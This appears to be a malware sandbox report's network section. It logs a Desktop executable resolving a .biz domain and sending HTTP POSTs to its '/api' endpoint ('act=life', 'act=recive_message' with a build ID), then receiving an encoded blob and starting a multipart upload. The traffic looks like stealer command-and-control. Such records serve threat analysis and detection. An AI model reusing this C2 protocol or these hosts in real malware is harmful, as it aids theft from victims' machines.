                                                                                                                Dec 17, 2024 09:44:56.757667065 CET49734443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:56.757702112 CET49734443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:57.383735895 CET49735443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:57.383785963 CET44349735104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:57.383857965 CET49735443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:57.384210110 CET49735443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:57.384223938 CET44349735104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:58.597469091 CET44349735104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:58.597610950 CET49735443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:58.645642996 CET49735443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:58.645680904 CET44349735104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:58.646047115 CET44349735104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:44:58.658598900 CET49735443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:58.658598900 CET49735443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:44:58.658668041 CET44349735104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:00.567850113 CET44349735104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:00.568123102 CET44349735104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:00.568397999 CET49735443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:00.568474054 CET49735443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:00.568490982 CET44349735104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:01.807569027 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:01.807615995 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:01.807774067 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:01.808024883 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:01.808042049 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.023324966 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.023442984 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.028511047 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.028522968 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.028852940 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.036089897 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.036845922 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.036896944 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.037327051 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.037363052 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.037467003 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.037545919 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.037659883 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.037693024 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.037806034 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.037842989 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.037908077 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.037918091 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.037961960 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.037985086 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.038016081 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.038039923 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.038113117 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.038137913 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.038155079 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.038172960 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.038268089 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.038294077 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.079339981 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.079529047 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.079555988 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.108869076 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.108890057 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:05.480267048 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:05.480375051 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:05.480483055 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:05.480643988 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:05.480664015 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:05.491220951 CET49743443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:05.491270065 CET44349743104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:05.491556883 CET49743443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:05.491739988 CET49743443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:05.491745949 CET44349743104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:06.714467049 CET44349743104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:06.714843988 CET49743443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:06.718406916 CET49743443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:06.718416929 CET44349743104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:06.718725920 CET44349743104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:06.726628065 CET49743443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:06.726628065 CET49743443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:06.726815939 CET44349743104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:07.453095913 CET44349743104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:07.453372002 CET44349743104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:07.453458071 CET49743443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:07.453542948 CET49743443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:07.453542948 CET49743443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:07.453566074 CET44349743104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:07.453572035 CET44349743104.21.50.161192.168.2.4
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 17, 2024 09:44:44.702846050 CET5432653192.168.2.41.1.1.1
                                                                                                                Dec 17, 2024 09:44:45.018381119 CET53543261.1.1.1192.168.2.4
                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Dec 17, 2024 09:44:44.702846050 CET192.168.2.41.1.1.10xb986Standard query (0)tacitglibbr.bizA (IP address)IN (0x0001)false
                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Dec 17, 2024 09:44:45.018381119 CET1.1.1.1192.168.2.40xb986No error (0)tacitglibbr.biz104.21.50.161A (IP address)IN (0x0001)false
                                                                                                                Dec 17, 2024 09:44:45.018381119 CET1.1.1.1192.168.2.40xb986No error (0)tacitglibbr.biz172.67.164.37A (IP address)IN (0x0001)false
                                                                                                                • tacitglibbr.biz
                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.449730104.21.50.1614437536C:\Users\user\Desktop\X2hna87N3Y.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-17 08:44:46 UTC262OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: tacitglibbr.biz
                                                                                                                2024-12-17 08:44:46 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life
                                                                                                                2024-12-17 08:44:47 UTC1038INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 17 Dec 2024 08:44:47 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=2pkqkbejmjdfev3o7aj9cshevb; expires=Sat, 12-Apr-2025 02:31:25 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pO%2FwRO9zxO9qH1ZTwmiXohayZhEWwPioOX8BcPnfPJY%2FR898wLqe2oz34RxUnqNSNBGYEYJCYv7NjHtVuqobbSIChfyOO%2FVXkGM2u0kpmPQ13CMC%2F0bwbWclYjgtT8r94I8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f35a216c9e642ea-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3604&min_rtt=2355&rtt_var=1775&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=906&delivery_rate=1239915&cwnd=143&unsent_bytes=0&cid=0f55ae176e3ad717&ts=1008&x=0"
                                                                                                                2024-12-17 08:44:47 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                Data Ascii: 2ok
                                                                                                                2024-12-17 08:44:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.449731104.21.50.1614437536C:\Users\user\Desktop\X2hna87N3Y.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-17 08:44:48 UTC263OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 52
                                                                                                                Host: tacitglibbr.biz
                                                                                                                2024-12-17 08:44:48 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 37 39 31 31 37 33 31 39 35 34 26 6a 3d
                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--7911731954&j=
                                                                                                                2024-12-17 08:44:49 UTC1037INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 17 Dec 2024 08:44:49 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=5d59o0refr4flp0v0m9345dplo; expires=Sat, 12-Apr-2025 02:31:28 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=elwcBqOEp%2B9mdzv1EImN3UFJwRiNCOhxLfqf3K7zibXMi5je2W0h%2FvdOENW%2FINncT2scRah3eFlV0660sj23hjdyjRiYpeNXiyBUnjYb16sEeU4gFj5gQiQQmLv%2ByPTSBR0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f35a224fa94c434-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1478&rtt_var=562&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=951&delivery_rate=1935056&cwnd=196&unsent_bytes=0&cid=6332c3b902aad9da&ts=1058&x=0"
                                                                                                                2024-12-17 08:44:49 UTC332INData Raw: 33 35 64 35 0d 0a 35 59 30 2f 47 78 75 67 34 37 51 6f 6d 42 76 76 6e 47 71 4a 32 2b 6d 42 6d 62 4f 62 35 47 79 37 49 57 35 4b 64 71 6f 51 46 78 75 65 72 30 6b 35 49 5a 54 50 6c 6c 76 39 4f 64 58 6f 47 50 79 2b 78 61 50 34 31 37 6e 65 43 74 70 4e 48 53 39 61 69 47 5a 36 4f 64 2f 72 58 6e 64 6f 78 63 2b 57 54 65 41 35 31 63 63 52 71 37 36 48 6f 36 4f 52 2f 6f 34 4f 32 6b 30 4d 4b 78 33 46 59 48 74 34 6a 65 46 59 63 33 37 44 68 39 56 45 39 58 36 4b 2b 51 76 6a 74 59 44 73 38 64 36 35 79 45 37 65 57 30 78 77 56 4f 64 31 59 33 71 6f 37 45 78 77 4f 64 33 50 7a 77 72 39 64 63 32 6d 53 4f 69 2b 69 2b 33 2f 31 2f 43 4d 42 4e 4e 46 44 53 34 63 32 6e 6c 78 63 34 33 76 57 33 4a 30 79 70 50 59 54 76 4a 31 6a 50 4d 4c 71 2f 66 4c 35 4f 4f 52 6f 63 5a 64 36 30 41 64 4f
                                                                                                                Data Ascii: 35d55Y0/Gxug47QomBvvnGqJ2+mBmbOb5Gy7IW5KdqoQFxuer0k5IZTPllv9OdXoGPy+xaP417neCtpNHS9aiGZ6Od/rXndoxc+WTeA51ccRq76Ho6OR/o4O2k0MKx3FYHt4jeFYc37Dh9VE9X6K+QvjtYDs8d65yE7eW0xwVOd1Y3qo7ExwOd3Pzwr9dc2mSOi+i+3/1/CMBNNFDS4c2nlxc43vW3J0ypPYTvJ1jPMLq/fL5OORocZd60AdO
                                                                                                                2024-12-17 08:44:49 UTC1369INData Raw: 71 53 41 38 67 44 45 32 59 4e 69 48 56 35 4f 64 2b 76 57 33 64 34 7a 34 48 45 51 76 46 79 69 4f 77 44 34 72 53 47 34 2f 62 62 39 6f 55 4f 33 6b 6b 47 4a 78 37 4d 66 33 68 2f 68 2b 38 64 4e 7a 6e 46 6d 5a 59 53 75 6c 71 49 37 67 2f 6e 72 38 6e 5a 75 38 36 33 6e 30 37 65 54 30 78 77 56 4d 42 33 64 6e 71 4d 34 46 35 78 63 74 43 42 78 45 7a 33 66 4a 2f 34 44 65 57 7a 69 50 48 78 33 2f 2b 46 42 39 4a 4b 43 53 38 51 69 44 77 31 66 70 2b 76 42 54 6c 59 7a 34 72 61 51 4f 31 35 7a 65 46 47 38 76 6d 4d 37 37 75 4a 75 59 49 50 33 55 49 49 4a 68 72 4d 66 6e 4e 33 69 75 42 62 63 33 6e 46 69 39 35 43 2b 33 53 47 38 51 6a 75 74 49 2f 6c 39 39 44 38 78 6b 43 5a 52 42 52 6f 54 49 68 63 63 6e 71 56 72 57 68 36 64 38 79 47 77 41 72 6c 4e 35 53 2b 44 2b 66 35 30 36 50 31 31
                                                                                                                Data Ascii: qSA8gDE2YNiHV5Od+vW3d4z4HEQvFyiOwD4rSG4/bb9oUO3kkGJx7Mf3h/h+8dNznFmZYSulqI7g/nr8nZu863n07eT0xwVMB3dnqM4F5xctCBxEz3fJ/4DeWziPHx3/+FB9JKCS8QiDw1fp+vBTlYz4raQO15zeFG8vmM77uJuYIP3UIIJhrMfnN3iuBbc3nFi95C+3SG8QjutI/l99D8xkCZRBRoTIhccnqVrWh6d8yGwArlN5S+D+f506P11
                                                                                                                2024-12-17 08:44:49 UTC1369INData Raw: 58 41 77 73 77 56 4a 41 79 52 47 36 4d 72 57 68 36 64 38 79 47 77 41 72 6c 4e 35 53 2b 44 2b 66 35 30 36 50 32 32 66 79 44 41 64 68 4a 41 69 30 65 78 48 70 37 65 70 58 67 57 58 6c 31 79 6f 76 62 52 50 35 78 68 50 55 44 37 62 6d 4b 36 62 75 66 75 59 45 57 6d 52 74 4d 48 42 50 45 66 33 6f 37 73 75 78 54 64 33 37 55 77 63 6b 45 34 7a 6d 4b 38 6b 69 7a 2b 59 66 71 2b 39 72 7a 67 67 37 65 54 67 6b 72 45 38 74 2f 63 6e 4f 4a 36 46 6c 31 63 4d 2b 48 31 6b 33 2b 66 4a 2f 37 41 65 65 31 79 36 32 37 31 75 48 47 56 70 6c 73 43 7a 34 58 35 33 46 6b 63 4d 66 77 45 32 41 35 78 59 32 57 45 72 70 2b 69 50 59 44 37 62 47 4c 38 66 37 66 38 6f 63 45 33 30 49 42 4a 42 4c 49 63 33 56 2f 69 2b 39 61 66 6d 76 51 68 4e 42 59 38 44 6e 44 76 67 2f 7a 2b 64 4f 6a 7a 63 48 75 6c 78
                                                                                                                Data Ascii: XAwswVJAyRG6MrWh6d8yGwArlN5S+D+f506P22fyDAdhJAi0exHp7epXgWXl1yovbRP5xhPUD7bmK6bufuYEWmRtMHBPEf3o7suxTd37UwckE4zmK8kiz+Yfq+9rzgg7eTgkrE8t/cnOJ6Fl1cM+H1k3+fJ/7Aee1y6271uHGVplsCz4X53FkcMfwE2A5xY2WErp+iPYD7bGL8f7f8ocE30IBJBLIc3V/i+9afmvQhNBY8DnDvg/z+dOjzcHulx
                                                                                                                2024-12-17 08:44:49 UTC1369INData Raw: 4a 78 7a 41 66 58 70 39 69 65 6c 62 64 48 7a 4e 69 38 52 43 39 48 53 47 38 51 50 35 75 59 62 6e 39 39 58 78 6a 51 53 5a 44 55 77 76 44 49 67 71 4e 55 79 4b 34 46 31 36 62 34 4b 65 6d 46 4f 36 66 6f 47 2b 55 4b 75 31 68 65 50 30 33 66 57 4e 42 74 68 50 41 69 38 52 77 58 70 39 61 34 62 72 56 58 68 33 7a 59 44 53 54 2f 39 39 69 76 6f 4f 35 50 6e 46 6f 2f 7a 4a 75 64 35 4f 39 6d 51 35 61 6a 58 79 4d 6d 6f 33 6e 71 39 61 64 54 6d 61 77 64 70 4a 39 6e 47 43 2b 41 48 6e 73 34 4c 6f 39 39 72 39 69 67 66 63 52 51 30 74 45 63 6c 32 65 58 4f 42 37 46 35 32 64 73 32 4a 6c 67 53 36 66 70 57 2b 55 4b 75 63 6e 4f 6a 31 31 37 6d 5a 51 4d 41 44 43 79 52 55 6b 44 4a 35 63 49 48 70 57 48 56 34 78 49 6e 54 51 76 35 34 69 2f 67 4c 35 4c 32 4f 34 76 54 56 39 59 67 45 32 45 49
                                                                                                                Data Ascii: JxzAfXp9ielbdHzNi8RC9HSG8QP5uYbn99XxjQSZDUwvDIgqNUyK4F16b4KemFO6foG+UKu1heP03fWNBthPAi8RwXp9a4brVXh3zYDST/99ivoO5PnFo/zJud5O9mQ5ajXyMmo3nq9adTmawdpJ9nGC+AHns4Lo99r9igfcRQ0tEcl2eXOB7F52ds2JlgS6fpW+UKucnOj117mZQMADCyRUkDJ5cIHpWHV4xInTQv54i/gL5L2O4vTV9YgE2EI
                                                                                                                2024-12-17 08:44:49 UTC1369INData Raw: 6e 56 36 66 59 44 6a 57 33 5a 2f 77 34 54 63 52 76 31 38 68 76 45 45 71 2f 66 4c 35 4f 4f 52 6f 63 59 67 30 6c 41 62 4b 78 72 44 5a 47 34 35 6d 4b 46 45 4f 58 37 4f 77 59 34 4b 2b 58 4b 47 2b 67 6a 6e 75 59 2f 75 2b 38 50 32 67 51 6e 51 53 42 34 69 45 38 39 35 66 58 4b 49 36 55 39 31 64 39 43 45 78 46 69 36 4e 38 33 35 45 4b 76 68 79 39 58 38 77 65 6d 46 54 4f 68 56 44 7a 34 66 78 58 34 31 5a 73 6e 32 48 58 35 31 67 74 6d 57 54 50 56 77 6a 76 45 4a 34 72 57 47 35 76 4c 55 2b 49 41 4b 30 30 6b 4d 4c 68 4c 4a 64 33 39 36 68 75 56 55 66 6e 48 46 67 73 51 4b 74 44 6d 4b 35 6b 69 7a 2b 61 4c 6b 36 64 2f 70 78 68 47 58 57 6b 77 76 47 49 67 71 4e 58 32 4e 34 46 6c 2b 64 63 53 45 30 45 66 37 64 6f 7a 2b 42 2b 2b 79 67 75 58 36 33 50 79 4c 43 73 74 4a 42 79 63 59
                                                                                                                Data Ascii: nV6fYDjW3Z/w4TcRv18hvEEq/fL5OORocYg0lAbKxrDZG45mKFEOX7OwY4K+XKG+gjnuY/u+8P2gQnQSB4iE895fXKI6U91d9CExFi6N835EKvhy9X8wemFTOhVDz4fxX41Zsn2HX51gtmWTPVwjvEJ4rWG5vLU+IAK00kMLhLJd396huVUfnHFgsQKtDmK5kiz+aLk6d/pxhGXWkwvGIgqNX2N4Fl+dcSE0Ef7doz+B++yguX63PyLCstJBycY
                                                                                                                2024-12-17 08:44:49 UTC1369INData Raw: 4f 43 35 56 42 36 64 73 47 54 31 30 7a 6f 65 59 44 30 47 75 47 79 6a 75 37 32 33 50 71 41 43 4e 4a 50 48 69 45 55 79 33 6b 31 4e 38 66 6f 52 54 6b 68 67 71 4c 42 58 50 42 2b 67 65 67 44 36 72 71 64 37 75 75 52 74 38 59 66 33 6c 4a 4d 63 41 4c 59 5a 58 4a 6d 79 66 59 64 66 6e 57 43 32 5a 5a 4d 38 33 2b 4b 2b 41 62 35 76 49 33 73 39 4e 6a 77 67 67 62 61 51 77 67 73 45 38 31 78 65 58 4b 41 37 46 4a 39 63 4d 79 49 32 51 71 30 4f 59 72 6d 53 4c 50 35 71 76 6a 34 33 66 54 47 45 5a 64 61 54 43 38 59 69 43 6f 31 64 59 6e 71 58 58 4e 2f 78 6f 54 51 51 50 39 35 68 76 30 48 37 37 2b 50 37 50 76 61 38 49 63 49 33 45 6b 48 4c 68 6e 4c 64 48 4d 35 79 61 39 61 59 54 6d 61 77 66 5a 52 39 33 57 4b 76 68 65 6c 6f 4d 76 6b 39 35 47 68 78 67 58 56 52 77 73 6f 47 63 74 36 63
                                                                                                                Data Ascii: OC5VB6dsGT10zoeYD0GuGyju723PqACNJPHiEUy3k1N8foRTkhgqLBXPB+gegD6rqd7uuRt8Yf3lJMcALYZXJmyfYdfnWC2ZZM83+K+Ab5vI3s9NjwggbaQwgsE81xeXKA7FJ9cMyI2Qq0OYrmSLP5qvj43fTGEZdaTC8YiCo1dYnqXXN/xoTQQP95hv0H77+P7Pva8IcI3EkHLhnLdHM5ya9aYTmawfZR93WKvheloMvk95GhxgXVRwsoGct6c
                                                                                                                2024-12-17 08:44:49 UTC1369INData Raw: 4c 65 6c 62 42 6b 4e 38 4b 74 44 6d 4b 36 45 69 7a 2b 62 57 6a 36 64 4c 70 68 51 48 49 66 55 78 77 44 66 59 79 66 6d 2b 41 2f 31 35 76 63 73 2b 4e 78 33 53 36 49 64 6d 73 57 72 6e 72 32 66 79 37 7a 73 62 49 54 74 67 44 56 42 45 4e 69 47 51 31 49 64 57 68 48 57 73 35 6d 73 47 52 53 65 68 72 69 2f 30 65 36 50 36 31 33 64 7a 48 38 34 45 65 33 6c 51 44 61 46 71 49 66 54 55 68 76 71 39 55 66 6d 4c 54 6c 39 74 61 2f 54 6d 79 73 45 6a 7a 2b 64 4f 6a 7a 74 4c 33 69 41 6e 50 55 6b 45 50 41 73 4a 31 5a 58 36 51 34 42 30 33 4f 63 54 42 6a 68 6d 30 4f 59 6e 76 53 4c 50 70 32 62 69 75 67 71 37 57 58 4d 59 4e 46 57 67 43 69 43 6f 6e 4e 38 66 39 48 53 45 35 68 59 4c 45 57 50 78 36 6d 2f 31 50 31 59 65 73 2b 66 62 58 37 70 63 77 35 30 51 57 4a 52 4c 66 59 7a 6c 73 68 4f
                                                                                                                Data Ascii: LelbBkN8KtDmK6Eiz+bWj6dLphQHIfUxwDfYyfm+A/15vcs+Nx3S6IdmsWrnr2fy7zsbITtgDVBENiGQ1IdWhHWs5msGRSehri/0e6P613dzH84Ee3lQDaFqIfTUhvq9UfmLTl9ta/TmysEjz+dOjztL3iAnPUkEPAsJ1ZX6Q4B03OcTBjhm0OYnvSLPp2biugq7WXMYNFWgCiConN8f9HSE5hYLEWPx6m/1P1Yes+fbX7pcw50QWJRLfYzlshO
                                                                                                                2024-12-17 08:44:49 UTC1369INData Raw: 67 73 2b 57 54 4c 6f 68 33 62 42 49 37 36 6a 4c 75 36 75 44 6f 74 4e 64 6a 68 4e 65 4e 31 72 52 4d 6d 4d 35 33 37 30 54 4f 57 75 43 32 5a 59 4e 2b 57 75 66 2b 41 76 39 75 73 7a 64 78 66 62 33 67 51 2f 50 55 78 73 6e 4b 76 5a 6e 64 6e 65 4a 36 45 74 6f 4f 59 7a 42 32 51 71 69 51 4d 32 32 53 4e 54 33 79 2f 75 37 69 62 6d 7a 44 64 64 4e 43 7a 34 46 68 56 56 37 66 6f 62 35 54 57 35 32 67 73 2b 57 54 4c 6f 68 33 37 42 49 37 36 6a 4c 75 36 75 44 6f 74 4e 64 6a 68 4e 65 4e 31 72 52 4d 6d 4d 35 33 37 30 54 4f 57 75 43 32 5a 59 4e 2b 57 75 66 2b 41 76 39 75 73 7a 64 78 66 62 33 67 51 2f 50 55 78 73 6e 57 2b 5a 45 56 45 65 35 2b 6c 35 33 64 38 57 58 78 77 71 30 4f 59 4b 2b 55 4e 4c 35 77 36 50 45 6e 37 6d 65 54 6f 45 44 4f 53 73 61 78 6e 56 6a 61 4d 72 49 55 33 35
                                                                                                                Data Ascii: gs+WTLoh3bBI76jLu6uDotNdjhNeN1rRMmM5370TOWuC2ZYN+Wuf+Av9uszdxfb3gQ/PUxsnKvZndneJ6EtoOYzB2QqiQM22SNT3y/u7ibmzDddNCz4FhVV7fob5TW52gs+WTLoh37BI76jLu6uDotNdjhNeN1rRMmM5370TOWuC2ZYN+Wuf+Av9uszdxfb3gQ/PUxsnW+ZEVEe5+l53d8WXxwq0OYK+UNL5w6PEn7meToEDOSsaxnVjaMrIU35
                                                                                                                2024-12-17 08:44:49 UTC1369INData Raw: 31 6a 39 61 59 36 38 4f 65 61 39 6e 66 62 34 77 66 36 34 4d 50 52 52 43 7a 67 58 69 6b 4e 6a 65 6f 66 68 57 6a 6b 33 67 70 6d 57 45 72 70 55 6e 2f 6b 59 36 50 6e 46 6f 2f 65 52 6f 63 59 44 79 30 51 63 4b 31 6a 50 61 48 49 35 6d 4b 46 45 4f 57 2b 43 32 59 55 45 75 6d 76 4e 70 6b 69 73 74 34 62 69 2b 4e 2f 36 6c 42 7a 66 51 42 6f 72 55 2f 5a 4d 57 47 75 41 2f 31 34 37 53 4d 2b 46 77 46 2f 35 61 59 72 41 4e 73 61 72 6a 50 50 34 6b 39 57 42 41 39 56 39 4d 68 38 46 7a 32 49 33 58 34 54 35 58 6a 6b 33 67 70 6d 57 45 72 70 55 6e 2f 6b 59 36 50 75 6e 35 50 62 64 75 5a 6c 41 77 41 4d 61 61 45 79 62 50 44 56 72 78 37 63 64 50 6e 72 51 6b 39 42 4a 37 48 72 4b 77 44 62 47 71 34 7a 7a 2b 4a 50 49 69 77 72 50 56 67 38 34 45 2f 5a 4d 57 47 75 41 2f 31 34 37 58 50 6a 44
                                                                                                                Data Ascii: 1j9aY68Oea9nfb4wf64MPRRCzgXikNjeofhWjk3gpmWErpUn/kY6PnFo/eRocYDy0QcK1jPaHI5mKFEOW+C2YUEumvNpkist4bi+N/6lBzfQBorU/ZMWGuA/147SM+FwF/5aYrANsarjPP4k9WBA9V9Mh8Fz2I3X4T5Xjk3gpmWErpUn/kY6Pun5PbduZlAwAMaaEybPDVrx7cdPnrQk9BJ7HrKwDbGq4zz+JPIiwrPVg84E/ZMWGuA/147XPjD


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.449732104.21.50.1614437536C:\Users\user\Desktop\X2hna87N3Y.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-17 08:44:51 UTC276OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=47HA2BJC5LRQZ
